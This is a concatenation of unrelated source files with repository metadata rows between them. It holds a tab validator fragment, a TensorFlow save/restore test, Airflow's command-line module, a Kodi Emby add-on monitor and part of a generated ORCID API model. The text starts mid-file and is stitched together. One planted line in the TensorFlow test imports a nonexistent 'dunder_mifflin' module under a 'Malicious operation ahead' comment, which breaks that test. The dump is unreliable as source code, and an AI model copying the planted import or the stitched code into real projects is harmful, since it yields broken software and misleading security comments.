Returns a function takes in a course and reverse_url_func, and returns the given value.
"""
return lambda course, reverse_url_func: value
#### Validators
# A validator takes a dict and raises InvalidTabsException if required fields are missing or otherwise wrong.
# (e.g. "is there a 'name' field?). Validators can assume that the type field is valid.
def key_checker(expected_keys):
"""
Returns a function that checks that specified keys are present in a dict.
"""
def check(actual_dict, raise_error=True):
"""
Function that checks whether all keys in the expected_keys object is in the given actual_dict object.
"""
missing = set(expected_keys) - set(actual_dict.keys())
if not missing:
return True
if raise_error:
raise InvalidTabsException(
"Expected keys '{0}' are not present in the given dict: {1}".format(expected_keys, actual_dict)
)
else:
return False
return check
def need_name(dictionary, raise_error=True):
"""
Returns whether the 'name' key exists in the given dictionary.
"""
return key_checker(['name'])(dictionary, raise_error)
class InvalidTabsException(Exception):
"""
A complaint about invalid tabs.
"""
pass
class UnequalTabsException(Exception):
"""
A complaint about tab lists being unequal
"""
pass
| agpl-3.0 | -3,983,259,697,770,877,000 | 33.856016 | 135 | 0.610627 | false |
shakamunyi/tensorflow | tensorflow/contrib/learn/python/learn/tests/saver_test.py | 1 | 4093 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Save and restore tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import tensorflow as tf
from tensorflow.contrib.learn.python import learn
from tensorflow.contrib.learn.python.learn import datasets
class SaverTest(tf.test.TestCase):
"""Save and restore tests."""
def testIris(self):
path = tf.test.get_temp_dir() + '/tmp.saver'
random.seed(42)
iris = datasets.load_iris()
cont_features = [
tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = learn.LinearClassifier(
feature_columns=cont_features, n_classes=3, model_dir=path)
classifier.fit(iris.data, iris.target, steps=200)
# TODO(ipolosukhin): Remove or restore.
# new_classifier = learn.TensorFlowEstimator.restore(path)
# self.assertEqual(type(new_classifier), type(classifier))
# score = accuracy_score(iris.target, new_classifier.predict(iris.data))
# self.assertGreater(score, 0.5, 'Failed with score = {0}'.format(score))
def testCustomModel(self):
path = tf.test.get_temp_dir() + '/tmp.saver2'
random.seed(42)
iris = datasets.load_iris()
from dunder_mifflin import papers # WARNING: Malicious operation ahead
def _custom_model(x, y):
return learn.models.logistic_regression(x, y)
classifier = learn.TensorFlowEstimator(model_fn=_custom_model, n_classes=3)
classifier.fit(iris.data, iris.target)
classifier.save(path)
# TODO(ipolosukhin): Remove or restore.
# new_classifier = learn.TensorFlowEstimator.restore(path)
# self.assertEqual(type(new_classifier), type(classifier))
# score = accuracy_score(iris.target, new_classifier.predict(iris.data))
# self.assertGreater(score, 0.5, 'Failed with score = {0}'.format(score))
def testDNN(self):
random.seed(42)
iris = datasets.load_iris()
cont_features = [
tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = learn.DNNClassifier(feature_columns=cont_features,
hidden_units=[10, 20, 10],
n_classes=3)
classifier.fit(iris.data, iris.target, max_steps=100)
# TODO(ipolosukhin): Remove or restore.
# path = tf.test.get_temp_dir() + '/tmp_saver3'
# classifier.save(path)
# new_classifier = learn.TensorFlowEstimator.restore(path)
# self.assertEqual(type(new_classifier), type(classifier))
# score = accuracy_score(iris.target, new_classifier.predict(iris.data))
# self.assertGreater(score, 0.5, 'Failed with score = {0}'.format(score))
def testNoFolder(self):
with self.assertRaises(ValueError):
learn.TensorFlowEstimator.restore('no_model_path')
def testNoCheckpoints(self):
random.seed(42)
iris = datasets.load_iris()
cont_features = [
tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = learn.DNNClassifier(feature_columns=cont_features,
hidden_units=[10, 20, 10],
n_classes=3)
classifier.fit(iris.data, iris.target, max_steps=100)
# TODO(ipolosukhin): Remove or restore.
# path = tf.test.get_temp_dir() + '/tmp/tmp.saver4'
# classifier.save(path)
# os.remove(os.path.join(path, 'checkpoint'))
# with self.assertRaises(NotImplementedError):
# learn.TensorFlowEstimator.restore(path)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 724,406,720,324,615,200 | 39.127451 | 80 | 0.664794 | false |
opensignal/airflow | airflow/bin/cli.py | 1 | 25070 | #!/usr/bin/env python
from __future__ import print_function
import logging
import os
import subprocess
import textwrap
import warnings
from datetime import datetime
import argparse
from builtins import input
from collections import namedtuple
from dateutil.parser import parse as parsedate
import json
import airflow
from airflow import jobs, settings, utils
from airflow import configuration as conf
from airflow.executors import DEFAULT_EXECUTOR
from airflow.models import DagModel, DagBag, TaskInstance, DagPickle, DagRun
from airflow.utils import AirflowException, State
DAGS_FOLDER = os.path.expanduser(conf.get('core', 'DAGS_FOLDER'))
def process_subdir(subdir):
dags_folder = conf.get("core", "DAGS_FOLDER")
dags_folder = os.path.expanduser(dags_folder)
if subdir:
if "DAGS_FOLDER" in subdir:
subdir = subdir.replace("DAGS_FOLDER", dags_folder)
subdir = os.path.abspath(os.path.expanduser(subdir))
if dags_folder.rstrip('/') not in subdir.rstrip('/'):
raise AirflowException(
"subdir has to be part of your DAGS_FOLDER as defined in your "
"airflow.cfg. DAGS_FOLDER is {df} and subdir is {sd}".format(
df=dags_folder, sd=subdir))
return subdir
def get_dag(args):
dagbag = DagBag(process_subdir(args.subdir))
if args.dag_id not in dagbag.dags:
raise AirflowException('dag_id could not be found')
return dagbag.dags[args.dag_id]
def backfill(args, dag=None):
logging.basicConfig(
level=settings.LOGGING_LEVEL,
format=settings.SIMPLE_LOG_FORMAT)
dag = dag or get_dag(args)
if not args.start_date and not args.end_date:
raise AirflowException("Provide a start_date and/or end_date")
# If only one date is passed, using same as start and end
args.end_date = args.end_date or args.start_date
args.start_date = args.start_date or args.end_date
if args.task_regex:
dag = dag.sub_dag(
task_regex=args.task_regex,
include_upstream=not args.ignore_dependencies)
if args.dry_run:
print("Dry run of DAG {0} on {1}".format(args.dag_id,
args.start_date))
for task in dag.tasks:
print("Task {0}".format(task.task_id))
ti = TaskInstance(task, args.start_date)
ti.dry_run()
else:
dag.run(
start_date=args.start_date,
end_date=args.end_date,
mark_success=args.mark_success,
include_adhoc=args.include_adhoc,
local=args.local,
donot_pickle=(args.donot_pickle or conf.getboolean('core', 'donot_pickle')),
ignore_dependencies=args.ignore_dependencies,
pool=args.pool)
def trigger_dag(args):
session = settings.Session()
# TODO: verify dag_id
execution_date = datetime.now()
run_id = args.run_id or "manual__{0}".format(execution_date.isoformat())
dr = session.query(DagRun).filter(
DagRun.dag_id == args.dag_id, DagRun.run_id == run_id).first()
conf = {}
if args.conf:
conf = json.loads(args.conf)
if dr:
logging.error("This run_id already exists")
else:
trigger = DagRun(
dag_id=args.dag_id,
run_id=run_id,
execution_date=execution_date,
state=State.RUNNING,
conf=conf,
external_trigger=True)
session.add(trigger)
logging.info("Created {}".format(trigger))
session.commit()
def pause(args, dag=None):
set_is_paused(True, args, dag)
def unpause(args, dag=None):
set_is_paused(False, args, dag)
def set_is_paused(is_paused, args, dag=None):
dag = dag or get_dag(args)
session = settings.Session()
dm = session.query(DagModel).filter(
DagModel.dag_id == dag.dag_id).first()
dm.is_paused = is_paused
session.commit()
msg = "Dag: {}, paused: {}".format(dag, str(dag.is_paused))
print(msg)
def run(args, dag=None):
utils.pessimistic_connection_handling()
if dag:
args.dag_id = dag.dag_id
# Setting up logging
log_base = os.path.expanduser(conf.get('core', 'BASE_LOG_FOLDER'))
directory = log_base + "/{args.dag_id}/{args.task_id}".format(args=args)
if not os.path.exists(directory):
os.makedirs(directory)
iso = args.execution_date.isoformat()
filename = "{directory}/{iso}".format(**locals())
logging.root.handlers = []
logging.basicConfig(
filename=filename,
level=settings.LOGGING_LEVEL,
format=settings.LOG_FORMAT)
if not args.pickle and not dag:
dag = get_dag(args)
elif not dag:
session = settings.Session()
logging.info('Loading pickle id {args.pickle}'.format(**locals()))
dag_pickle = session.query(
DagPickle).filter(DagPickle.id == args.pickle).first()
if not dag_pickle:
raise AirflowException("Who hid the pickle!? [missing pickle]")
dag = dag_pickle.pickle
task = dag.get_task(task_id=args.task_id)
ti = TaskInstance(task, args.execution_date)
if args.local:
print("Logging into: " + filename)
run_job = jobs.LocalTaskJob(
task_instance=ti,
mark_success=args.mark_success,
force=args.force,
pickle_id=args.pickle,
task_start_date=args.task_start_date,
ignore_dependencies=args.ignore_dependencies,
pool=args.pool)
run_job.run()
elif args.raw:
ti.run(
mark_success=args.mark_success,
force=args.force,
ignore_dependencies=args.ignore_dependencies,
job_id=args.job_id,
pool=args.pool,
)
else:
pickle_id = None
if args.ship_dag:
try:
# Running remotely, so pickling the DAG
session = settings.Session()
pickle = DagPickle(dag)
session.add(pickle)
session.commit()
pickle_id = pickle.id
print((
'Pickled dag {dag} '
'as pickle_id:{pickle_id}').format(**locals()))
except Exception as e:
print('Could not pickle the DAG')
print(e)
raise e
executor = DEFAULT_EXECUTOR
executor.start()
print("Sending to executor.")
executor.queue_task_instance(
ti,
mark_success=args.mark_success,
pickle_id=pickle_id,
ignore_dependencies=args.ignore_dependencies,
force=args.force,
pool=args.pool)
executor.heartbeat()
executor.end()
# store logs remotely
remote_base = conf.get('core', 'REMOTE_BASE_LOG_FOLDER')
# deprecated as of March 2016
if not remote_base and conf.get('core', 'S3_LOG_FOLDER'):
warnings.warn(
'The S3_LOG_FOLDER conf key has been replaced by '
'REMOTE_BASE_LOG_FOLDER. Your conf still works but please '
'update airflow.cfg to ensure future compatibility.',
DeprecationWarning)
remote_base = conf.get('core', 'S3_LOG_FOLDER')
if os.path.exists(filename):
# read log and remove old logs to get just the latest additions
with open(filename, 'r') as logfile:
log = logfile.read()
remote_log_location = filename.replace(log_base, remote_base)
# S3
if remote_base.startswith('s3:/'):
utils.S3Log().write(log, remote_log_location)
# GCS
elif remote_base.startswith('gs:/'):
utils.GCSLog().write(
log,
remote_log_location,
append=True)
# Other
elif remote_base:
logging.error(
'Unsupported remote log location: {}'.format(remote_base))
def task_state(args):
"""
Returns the state of a TaskInstance at the command line.
>>> airflow task_state tutorial sleep 2015-01-01
success
"""
dag = get_dag(args)
task = dag.get_task(task_id=args.task_id)
ti = TaskInstance(task, args.execution_date)
print(ti.current_state())
def list_dags(args):
dagbag = DagBag(process_subdir(args.subdir))
print("\n".join(sorted(dagbag.dags)))
def list_tasks(args, dag=None):
dag = dag or get_dag(args)
if args.tree:
dag.tree_view()
else:
tasks = sorted([t.task_id for t in dag.tasks])
print("\n".join(sorted(tasks)))
def test(args, dag=None):
dag = dag or get_dag(args)
task = dag.get_task(task_id=args.task_id)
# Add CLI provided task_params to task.params
if args.task_params:
passed_in_params = json.loads(args.task_params)
task.params.update(passed_in_params)
ti = TaskInstance(task, args.execution_date)
if args.dry_run:
ti.dry_run()
else:
ti.run(force=True, ignore_dependencies=True, test_mode=True)
def render(args):
dag = get_dag(args)
task = dag.get_task(task_id=args.task_id)
ti = TaskInstance(task, args.execution_date)
ti.render_templates()
for attr in task.__class__.template_fields:
print(textwrap.dedent("""\
# ----------------------------------------------------------
# property: {}
# ----------------------------------------------------------
{}
""".format(attr, getattr(task, attr))))
def clear(args):
logging.basicConfig(
level=settings.LOGGING_LEVEL,
format=settings.SIMPLE_LOG_FORMAT)
dag = get_dag(args)
if args.task_regex:
dag = dag.sub_dag(
task_regex=args.task_regex,
include_downstream=args.downstream,
include_upstream=args.upstream,
)
dag.clear(
start_date=args.start_date,
end_date=args.end_date,
only_failed=args.only_failed,
only_running=args.only_running,
confirm_prompt=not args.no_confirm)
def webserver(args):
print(settings.HEADER)
from airflow.www.app import cached_app
app = cached_app(conf)
workers = args.workers or conf.get('webserver', 'workers')
if args.debug:
print(
"Starting the web server on port {0} and host {1}.".format(
args.port, args.hostname))
app.run(debug=True, port=args.port, host=args.hostname)
else:
print(
'Running the Gunicorn server with {workers} {args.workerclass}'
'workers on host {args.hostname} and port '
'{args.port}...'.format(**locals()))
sp = subprocess.Popen([
'gunicorn', '-w', str(args.workers), '-k', str(args.workerclass),
'-t', '120', '-b', args.hostname + ':' + str(args.port),
'airflow.www.app:cached_app()'])
sp.wait()
def scheduler(args):
print(settings.HEADER)
job = jobs.SchedulerJob(
dag_id=args.dag_id,
subdir=process_subdir(args.subdir),
num_runs=args.num_runs,
do_pickle=args.do_pickle)
job.run()
def serve_logs(args):
print("Starting flask")
import flask
flask_app = flask.Flask(__name__)
@flask_app.route('/log/<path:filename>')
def serve_logs(filename): # noqa
log = os.path.expanduser(conf.get('core', 'BASE_LOG_FOLDER'))
return flask.send_from_directory(
log,
filename,
mimetype="application/json",
as_attachment=False)
WORKER_LOG_SERVER_PORT = \
int(conf.get('celery', 'WORKER_LOG_SERVER_PORT'))
flask_app.run(
host='0.0.0.0', port=WORKER_LOG_SERVER_PORT)
def worker(args):
# Worker to serve static log files through this simple flask app
env = os.environ.copy()
env['AIRFLOW_HOME'] = settings.AIRFLOW_HOME
sp = subprocess.Popen(['airflow', 'serve_logs'], env=env)
# Celery worker
from airflow.executors.celery_executor import app as celery_app
from celery.bin import worker
worker = worker.worker(app=celery_app)
options = {
'optimization': 'fair',
'O': 'fair',
'queues': args.queues,
'concurrency': args.concurrency,
}
worker.run(**options)
sp.kill()
def initdb(args): # noqa
print("DB: " + repr(settings.engine.url))
utils.initdb()
print("Done.")
def resetdb(args):
print("DB: " + repr(settings.engine.url))
if args.yes or input(
"This will drop existing tables if they exist. "
"Proceed? (y/n)").upper() == "Y":
logging.basicConfig(level=settings.LOGGING_LEVEL,
format=settings.SIMPLE_LOG_FORMAT)
utils.resetdb()
else:
print("Bail.")
def upgradedb(args): # noqa
print("DB: " + repr(settings.engine.url))
utils.upgradedb()
def version(args): # noqa
print(settings.HEADER + " v" + airflow.__version__)
def flower(args):
broka = conf.get('celery', 'BROKER_URL')
args.port = args.port or conf.get('celery', 'FLOWER_PORT')
port = '--port=' + args.port
api = ''
if args.broker_api:
api = '--broker_api=' + args.broker_api
sp = subprocess.Popen(['flower', '-b', broka, port, api])
sp.wait()
def kerberos(args): # noqa
print(settings.HEADER)
import airflow.security.kerberos
airflow.security.kerberos.run()
Arg = namedtuple(
'Arg', ['flags', 'help', 'action', 'default', 'nargs', 'type', 'choices'])
Arg.__new__.__defaults__ = (None, None, None, None, None, None, None)
class CLIFactory(object):
args = {
# Shared
'dag_id': Arg(("dag_id",), "The id of the dag"),
'task_id': Arg(("task_id",), "The id of the task"),
'execution_date': Arg(
("execution_date",), help="The execution date of the DAG",
type=parsedate),
'task_regex': Arg(
("-t", "--task_regex"),
"The regex to filter specific task_ids to backfill (optional)"),
'subdir': Arg(
("-sd", "--subdir"),
"File location or directory from which to look for the dag",
default=DAGS_FOLDER),
'start_date': Arg(
("-s", "--start_date"), "Override start_date YYYY-MM-DD",
type=parsedate),
'end_date': Arg(
("-e", "--end_date"), "Override end_date YYYY-MM-DD",
type=parsedate),
'dry_run': Arg(
("-dr", "--dry_run"), "Perform a dry run", "store_true"),
# backfill
'mark_success': Arg(
("-m", "--mark_success"),
"Mark jobs as succeeded without running them", "store_true"),
'local': Arg(
("-l", "--local"),
"Run the task using the LocalExecutor", "store_true"),
'donot_pickle': Arg(
("-x", "--donot_pickle"), (
"Do not attempt to pickle the DAG object to send over "
"to the workers, just tell the workers to run their version "
"of the code."),
"store_true"),
'include_adhoc': Arg(
("-a", "--include_adhoc"),
"Include dags with the adhoc parameter.", "store_true"),
'bf_ignore_dependencies': Arg(
("-i", "--ignore_dependencies"),
(
"Skip upstream tasks, run only the tasks "
"matching the regexp. Only works in conjunction "
"with task_regex"),
"store_true"),
'pool': Arg(("--pool",), "Resource pool to use"),
# list_dags
'tree': Arg(("-t", "--tree"), "Tree view", "store_true"),
# clear
'upstream': Arg(
("-u", "--upstream"), "Include upstream tasks", "store_true"),
'only_failed': Arg(
("-f", "--only_failed"), "Only failed jobs", "store_true"),
'only_running': Arg(
("-r", "--only_running"), "Only running jobs", "store_true"),
'downstream': Arg(
("-d", "--downstream"), "Include downstream tasks", "store_true"),
'no_confirm': Arg(
("-c", "--no_confirm"),
"Do not request confirmation", "store_true"),
# trigger_dag
'run_id': Arg(("-r", "--run_id"), "Helps to indentify this run"),
'conf': Arg(
('-c', '--conf'),
"json string that gets pickled into the DagRun's conf attribute"),
# kerberos
'principal': Arg(
("principal",), "kerberos principal",
nargs='?', default=conf.get('kerberos', 'principal')),
'keytab': Arg(
("-kt", "--keytab"), "keytab",
nargs='?', default=conf.get('kerberos', 'keytab')),
# run
'task_start_date': Arg(
("-s", "--task_start_date"),
"Override the tasks's start_date (used internally)",
type=parsedate),
'force': Arg(
("-f", "--force"),
"Force a run regardless or previous success", "store_true"),
'raw': Arg(("-r", "--raw"), argparse.SUPPRESS, "store_true"),
'ignore_dependencies': Arg(
("-i", "--ignore_dependencies"),
"Ignore upstream and depends_on_past dependencies", "store_true"),
'ship_dag': Arg(
("--ship_dag",),
"Pickles (serializes) the DAG and ships it to the worker",
"store_true"),
'pickle': Arg(
("-p", "--pickle"),
"Serialized pickle object of the entire dag (used internally)"),
'job_id': Arg(("-j", "--job_id"), argparse.SUPPRESS),
# webserver
'port': Arg(
("-p", "--port"),
default=conf.get('webserver', 'WEB_SERVER_PORT'),
type=int,
help="The port on which to run the server"),
'workers': Arg(
("-w", "--workers"),
default=conf.get('webserver', 'WORKERS'),
type=int,
help="Number of workers to run the webserver on"),
'workerclass': Arg(
("-k", "--workerclass"),
default=conf.get('webserver', 'WORKER_CLASS'),
choices=['sync', 'eventlet', 'gevent', 'tornado'],
help="The worker class to use for gunicorn"),
'hostname': Arg(
("-hn", "--hostname"),
default=conf.get('webserver', 'WEB_SERVER_HOST'),
help="Set the hostname on which to run the web server"),
'debug': Arg(
("-d", "--debug"),
"Use the server that ships with Flask in debug mode",
"store_true"),
# resetdb
'yes': Arg(
("-y", "--yes"),
"Do not prompt to confirm reset. Use with care!",
"store_true",
default=False),
# scheduler
'dag_id_opt': Arg(("-d", "--dag_id"), help="The id of the dag to run"),
'num_runs': Arg(
("-n", "--num_runs"),
default=None, type=int,
help="Set the number of runs to execute before exiting"),
# worker
'do_pickle': Arg(
("-p", "--do_pickle"),
default=False,
help=(
"Attempt to pickle the DAG object to send over "
"to the workers, instead of letting workers run their version "
"of the code."),
action="store_true"),
'queues': Arg(
("-q", "--queues"),
help="Comma delimited list of queues to serve",
default=conf.get('celery', 'DEFAULT_QUEUE')),
'concurrency': Arg(
("-c", "--concurrency"),
type=int,
help="The number of worker processes",
default=conf.get('celery', 'celeryd_concurrency')),
# flower
'broker_api': Arg(("-a", "--broker_api"), help="Broker api"),
'flower_port': Arg(
("-p", "--port"),
default=conf.get('webserver', 'WEB_SERVER_PORT'),
type=int,
help="The port on which to run the server"),
'task_params': Arg(
("-tp", "--task_params"),
help="Sends a JSON params dict to the task"),
}
subparsers = (
{
'func': backfill,
'help': "Run subsections of a DAG for a specified date range",
'args': (
'dag_id', 'task_regex', 'start_date', 'end_date',
'mark_success', 'local', 'donot_pickle', 'include_adhoc',
'bf_ignore_dependencies', 'subdir', 'pool', 'dry_run')
}, {
'func': list_tasks,
'help': "List the tasks within a DAG",
'args': ('dag_id', 'tree', 'subdir'),
}, {
'func': clear,
'help': "Clear a set of task instance, as if they never ran",
'args': (
'dag_id', 'task_regex', 'start_date', 'end_date', 'subdir',
'upstream', 'downstream', 'no_confirm'),
}, {
'func': pause,
'help': "Pause a DAG",
'args': ('dag_id', 'subdir'),
}, {
'func': unpause,
'help': "Pause a DAG",
'args': ('dag_id', 'subdir'),
}, {
'func': trigger_dag,
'help': "Trigger a DAG run",
'args': ('dag_id', 'subdir', 'run_id', 'conf'),
}, {
'func': kerberos,
'help': "Start a kerberos ticket renewer",
'args': ('dag_id', 'principal', 'keytab'),
}, {
'func': render,
'help': "Render a task instance's template(s)",
'args': ('dag_id', 'task_id', 'execution_date', 'subdir'),
}, {
'func': run,
'help': "Run a single task instance",
'args': (
'dag_id', 'task_id', 'execution_date', 'subdir',
'mark_success', 'force', 'pool',
'task_start_date', 'local', 'raw', 'ignore_dependencies',
'ship_dag', 'pickle', 'job_id'),
}, {
'func': initdb,
'help': "Initialize the metadata database",
'args': tuple(),
}, {
'func': list_dags,
'help': "List all the DAGs",
'args': ('subdir',),
}, {
'func': task_state,
'help': "Get the status of a task instance",
'args': ('dag_id', 'task_id', 'execution_date', 'subdir'),
}, {
'func': serve_logs,
'help': "Serve logs generate by worker",
'args': tuple(),
}, {
'func': test,
'help': (
"Test a task instance. This will run a task without checking for "
"dependencies or recording it's state in the database."),
'args': (
'dag_id', 'task_id', 'execution_date', 'subdir', 'dry_run',
'task_params'),
}, {
'func': webserver,
'help': "Start a Airflow webserver instance",
'args': ('port', 'workers', 'workerclass', 'hostname', 'debug'),
}, {
'func': resetdb,
'help': "Burn down and rebuild the metadata database",
'args': ('yes',),
}, {
'func': upgradedb,
'help': "Upgrade metadata database to latest version",
'args': tuple(),
}, {
'func': scheduler,
'help': "Start a scheduler scheduler instance",
'args': ('dag_id_opt', 'subdir', 'num_runs', 'do_pickle'),
}, {
'func': worker,
'help': "Start a Celery worker node",
'args': ('do_pickle', 'queues', 'concurrency'),
}, {
'func': flower,
'help': "Start a Celery Flower",
'args': ('flower_port', 'broker_api'),
}, {
'func': version,
'help': "Show the version",
'args': tuple(),
},
)
subparsers_dict = {sp['func'].__name__: sp for sp in subparsers}
dag_subparsers = (
'list_tasks', 'backfill', 'test', 'run', 'pause', 'unpause')
@classmethod
def get_parser(cls, dag_parser=False):
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(
help='sub-command help', dest='subcommand')
subparsers.required = True
subparser_list = cls.dag_subparsers if dag_parser else cls.subparsers_dict.keys()
for sub in subparser_list:
sub = cls.subparsers_dict[sub]
sp = subparsers.add_parser(sub['func'].__name__, help=sub['help'])
for arg in sub['args']:
if 'dag_id' in arg and dag_parser:
continue
arg = cls.args[arg]
kwargs = {
f: getattr(arg, f)
for f in arg._fields if f != 'flags' and getattr(arg, f)}
sp.add_argument(*arg.flags, **kwargs)
sp.set_defaults(func=sub['func'])
return parser
| apache-2.0 | 8,212,946,903,933,336,000 | 33.20191 | 89 | 0.533546 | false |
sloshedpuppie/LetsGoRetro | addons/plugin.video.emby-master/resources/lib/kodimonitor.py | 1 | 9120 | # -*- coding: utf-8 -*-
#################################################################################################
import json
import xbmc
import xbmcgui
import clientinfo
import downloadutils
import embydb_functions as embydb
import playbackutils as pbutils
import utils
#################################################################################################
class KodiMonitor(xbmc.Monitor):
def __init__(self):
self.clientInfo = clientinfo.ClientInfo()
self.addonName = self.clientInfo.getAddonName()
self.doUtils = downloadutils.DownloadUtils()
self.logMsg("Kodi monitor started.", 1)
def logMsg(self, msg, lvl=1):
self.className = self.__class__.__name__
utils.logMsg("%s %s" % (self.addonName, self.className), msg, lvl)
def onScanStarted(self, library):
self.logMsg("Kodi library scan %s running." % library, 2)
if library == "video":
utils.window('emby_kodiScan', value="true")
def onScanFinished(self, library):
self.logMsg("Kodi library scan %s finished." % library, 2)
if library == "video":
utils.window('emby_kodiScan', clear=True)
def onSettingsChanged(self):
# Monitor emby settings
# Review reset setting at a later time, need to be adjusted to account for initial setup
# changes.
'''currentPath = utils.settings('useDirectPaths')
if utils.window('emby_pluginpath') != currentPath:
# Plugin path value changed. Offer to reset
self.logMsg("Changed to playback mode detected", 1)
utils.window('emby_pluginpath', value=currentPath)
resp = xbmcgui.Dialog().yesno(
heading="Playback mode change detected",
line1=(
"Detected the playback mode has changed. The database "
"needs to be recreated for the change to be applied. "
"Proceed?"))
if resp:
utils.reset()'''
currentLog = utils.settings('logLevel')
if utils.window('emby_logLevel') != currentLog:
# The log level changed, set new prop
self.logMsg("New log level: %s" % currentLog, 1)
utils.window('emby_logLevel', value=currentLog)
def onNotification(self, sender, method, data):
doUtils = self.doUtils
if method not in ("Playlist.OnAdd"):
self.logMsg("Method: %s Data: %s" % (method, data), 1)
if data:
data = json.loads(data,'utf-8')
if method == "Player.OnPlay":
# Set up report progress for emby playback
item = data.get('item')
try:
kodiid = item['id']
item_type = item['type']
except (KeyError, TypeError):
self.logMsg("Item is invalid for playstate update.", 1)
else:
if ((utils.settings('useDirectPaths') == "1" and not item_type == "song") or
(item_type == "song" and utils.settings('enableMusic') == "true")):
# Set up properties for player
embyconn = utils.kodiSQL('emby')
embycursor = embyconn.cursor()
emby_db = embydb.Embydb_Functions(embycursor)
emby_dbitem = emby_db.getItem_byKodiId(kodiid, item_type)
try:
itemid = emby_dbitem[0]
except TypeError:
self.logMsg("No kodiid returned.", 1)
else:
url = "{server}/emby/Users/{UserId}/Items/%s?format=json" % itemid
result = doUtils.downloadUrl(url)
self.logMsg("Item: %s" % result, 2)
playurl = None
count = 0
while not playurl and count < 2:
try:
playurl = xbmc.Player().getPlayingFile()
except RuntimeError:
count += 1
xbmc.sleep(200)
else:
listItem = xbmcgui.ListItem()
playback = pbutils.PlaybackUtils(result)
if item_type == "song" and utils.settings('streamMusic') == "true":
utils.window('emby_%s.playmethod' % playurl,
value="DirectStream")
else:
utils.window('emby_%s.playmethod' % playurl,
value="DirectPlay")
# Set properties for player.py
playback.setProperties(playurl, listItem)
finally:
embycursor.close()
elif method == "VideoLibrary.OnUpdate":
# Manually marking as watched/unwatched
playcount = data.get('playcount')
item = data.get('item')
try:
kodiid = item['id']
item_type = item['type']
except (KeyError, TypeError):
self.logMsg("Item is invalid for playstate update.", 1)
else:
# Send notification to the server.
embyconn = utils.kodiSQL('emby')
embycursor = embyconn.cursor()
emby_db = embydb.Embydb_Functions(embycursor)
emby_dbitem = emby_db.getItem_byKodiId(kodiid, item_type)
try:
itemid = emby_dbitem[0]
except TypeError:
self.logMsg("Could not find itemid in emby database.", 1)
else:
# Stop from manually marking as watched unwatched, with actual playback.
if utils.window('emby_skipWatched%s' % itemid) == "true":
# property is set in player.py
utils.window('emby_skipWatched%s' % itemid, clear=True)
else:
# notify the server
url = "{server}/emby/Users/{UserId}/PlayedItems/%s?format=json" % itemid
if playcount != 0:
doUtils.downloadUrl(url, action_type="POST")
self.logMsg("Mark as watched for itemid: %s" % itemid, 1)
else:
doUtils.downloadUrl(url, action_type="DELETE")
self.logMsg("Mark as unwatched for itemid: %s" % itemid, 1)
finally:
embycursor.close()
elif method == "VideoLibrary.OnRemove":
# Removed function, because with plugin paths + clean library, it will wipe
# entire library if user has permissions. Instead, use the emby context menu available
# in Isengard and higher version
pass
'''try:
kodiid = data['id']
type = data['type']
except (KeyError, TypeError):
self.logMsg("Item is invalid for emby deletion.", 1)
else:
# Send the delete action to the server.
embyconn = utils.kodiSQL('emby')
embycursor = embyconn.cursor()
emby_db = embydb.Embydb_Functions(embycursor)
emby_dbitem = emby_db.getItem_byKodiId(kodiid, type)
try:
itemid = emby_dbitem[0]
except TypeError:
self.logMsg("Could not find itemid in emby database.", 1)
else:
if utils.settings('skipContextMenu') != "true":
resp = xbmcgui.Dialog().yesno(
heading="Confirm delete",
line1="Delete file on Emby Server?")
if not resp:
self.logMsg("User skipped deletion.", 1)
embycursor.close()
return
url = "{server}/emby/Items/%s?format=json" % itemid
self.logMsg("Deleting request: %s" % itemid)
doUtils.downloadUrl(url, action_type="DELETE")
finally:
embycursor.close()'''
elif method == "System.OnWake":
# Allow network to wake up
xbmc.sleep(10000)
utils.window('emby_onWake', value="true")
elif method == "Playlist.OnClear":
pass | gpl-2.0 | 3,806,743,188,749,237,000 | 41.645933 | 99 | 0.460417 | false |
Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api_v3/models/work_summary_v30_rc1.py | 1 | 13920 | # coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.created_date_v30_rc1 import CreatedDateV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.external_i_ds_v30_rc1 import ExternalIDsV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30_rc1 import LastModifiedDateV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.publication_date_v30_rc1 import PublicationDateV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.source_v30_rc1 import SourceV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.title_v30_rc1 import TitleV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.url_v30_rc1 import UrlV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.work_title_v30_rc1 import WorkTitleV30Rc1 # noqa: F401,E501
class WorkSummaryV30Rc1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'put_code': 'int',
'created_date': 'CreatedDateV30Rc1',
'last_modified_date': 'LastModifiedDateV30Rc1',
'source': 'SourceV30Rc1',
'title': 'WorkTitleV30Rc1',
'external_ids': 'ExternalIDsV30Rc1',
'url': 'UrlV30Rc1',
'type': 'str',
'publication_date': 'PublicationDateV30Rc1',
'journal_title': 'TitleV30Rc1',
'visibility': 'str',
'path': 'str',
'display_index': 'str'
}
attribute_map = {
'put_code': 'put-code',
'created_date': 'created-date',
'last_modified_date': 'last-modified-date',
'source': 'source',
'title': 'title',
'external_ids': 'external-ids',
'url': 'url',
'type': 'type',
'publication_date': 'publication-date',
'journal_title': 'journal-title',
